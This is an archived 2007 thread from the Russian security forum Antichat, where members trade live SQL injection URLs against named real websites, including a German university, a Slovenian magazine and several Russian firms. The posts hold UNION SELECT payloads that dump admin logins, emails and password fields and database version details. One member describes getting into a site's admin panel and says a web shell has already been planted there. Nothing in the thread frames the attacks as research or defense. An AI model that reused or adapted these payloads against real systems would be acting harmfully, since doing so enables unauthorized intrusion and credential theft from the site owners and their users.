ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.03.2007, 15:11
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816
Репутация:
181
|
|
http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,7,8,9/*
http://www.php.com/include/groups/showInfo.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22/*
Последний раз редактировалось Colkru; 06.03.2007 в 15:35..
|
|
|
06.03.2007, 16:03
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от Colkru
http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,7,8,9/*
http://www.php.com/include/groups/showInfo.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22/*
на php.com я выкладывал уже, вроде даже этот скрипт.
По поводу первого - немного заюзаем уязвимость 
Код:
http://www.uni-kassel.de/~sesame/_Welcome.html
тут скрипт, кажись админский 
пассы выдираем запросом
Код:
http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,password,8,9+from+users/*
username не нужен, да и нет его в таблице имхо)
Сообщение от Colkru
Тогда сорри, не могу же я из стольких страниц темы знать какие скули были. К тому же поиск не нашел.
без проблем, это вполне нормально..
поиск не ищет, т.к. многие в [*code] пихают запросы) но оно и к лучшему)
Последний раз редактировалось n1†R0x; 06.03.2007 в 16:20..
|
|
|
|
06.03.2007, 17:19
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
поиск не ищет, т.к. многие в [*code] пихают запросы) но оно и к лучшему)
я в цитаты кидаю, так ИМХО более читаемо =)
такс...
http://www.pcmg.si/index.php?id=-6+union+select+1,2,3,4,5,6
админовский логин и пароль, не удивляйтесь что лимит стоит =)
http://www.pcmg.si/index.php?id=-6+union+select+1,2,3,concat(username,char(58),pass word),5,6+from+users+limit+4,1
админка
http://www.pcmg.si/admin/
Там кликаем куда нить слева (хз чё там написано) и льём шелл.
Шелл уже залит кстати =D но ссылку не могу дать ))
|
|
|
|
06.03.2007, 17:20
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Код:
http://www.smartsystemsllc.com/ru/products.php?pr_id=-99+union+select+111,222/*
O_o
по-шарить так и не смог... ничерта не грузится =\ с каналом что-то =\ |
|
|
|
06.03.2007, 17:58
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816
Репутация:
181
|
|
вот еще
http://mk.uct.ua/?q=category&id=-1+union+select+1,2,3,4,5,6,7,version()/*
|
|
|
|
06.03.2007, 18:00
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
__http://www.mywindow.ru/index.php?category=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5/*
__http://www.dreamokna.ru/?sec=15&item=10000000000+union+select+1,2,3/*
__http://www.akademokna.ru/pages.php?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*
|
|
|
|
06.03.2007, 19:36
|
|
Новичок
Регистрация: 06.03.2007
Сообщений: 2
Провел на форуме:
9172
Репутация:
0
|
|
Код:
http://www.rocit.ru/news/shownews.php3?id=30100+UNION+SELECT+1,USER_ID,3,4,5,6,7,8,9,0+FROM+USER/*
PR=6
Но к сожалению без вывода
Код:
http://www.ladofon.ru/news_detail.php?news_id=69+UNION+SELECT+1,2,3,concat(email,char(58),password),5,6,7,8+FROM+user/*
PR=4
Последний раз редактировалось Darg; 06.03.2007 в 20:08..
Причина: добавка
|
|
|
|
06.03.2007, 19:49
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Darg, мой тебе совет, по-крайней мере в этой теме... - если после твоего поста больше ничего не было - то просто нажимай -Edit- и добавляй новый пост в предыдущий... =\
|
|
|
|
06.03.2007, 20:00
|
|
Познающий
Регистрация: 31.08.2006
Сообщений: 67
Провел на форуме:
377085
Репутация:
18
|
|
Код:
http://www.tradeinter.ru/news.php?id=2'
Код:
http://www.tradeinter.ru/cat.php?id=77'
|
|
|
|
06.03.2007, 20:30
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от Darg
Не более чем раскрытие пути...
Врёте вы всё 
Код:
http://www.tradeinter.ru/cat.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
Последний раз редактировалось ice1k; 06.03.2007 в 20:33..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
